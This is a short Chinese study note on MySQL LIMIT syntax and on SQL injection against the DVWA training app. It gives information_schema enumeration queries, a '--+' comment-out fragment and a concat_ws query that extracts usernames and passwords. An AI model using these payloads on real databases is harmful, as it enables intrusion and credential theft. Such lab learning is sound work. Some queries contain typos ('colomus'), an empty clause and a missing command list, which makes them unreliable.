1、limit用法:
limit是mysql的语法
select * from table limit m,n
其中m是指记录开始的index,从0开始,表示第一条记录
n是指从第m+1条开始,取n条。
select * from tablename limit 2,4
即取出第3条至第6条,4条记录
例如:DVWA中级别:
2、Mysql数据库information_schema系统表说明
3、查表名:select table_name from information_schema.tables where table_schema=' '--+ limit 0,1
查列名:select column_name from information_schema.columns where table_schema= and table_name= limit 0,1
查字段:select column_name from information_schema.columns where table_name='表名'
查用户名密码:select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 1,1
4、mysql常用命令:
MYSQL常用查命令:
1 2 3 4 5 6 7 8 9 10 |
|
5、在知道数据库名的情况下先找表在找列:
找表:select table_name from information_schema.tables where table_schema='dvwa' 或者用16进制 表的数据库
找列:select column_name from information_schema.colomus where table_schema='dvwa' and table_name='lz' limit 0,1 表的数据库及表的名称
查用户名密码:select 1,2,concat_ws(char(32,58,32),id,username,password) from users limit 1,1 找出表的列名后,最后查用户名密码;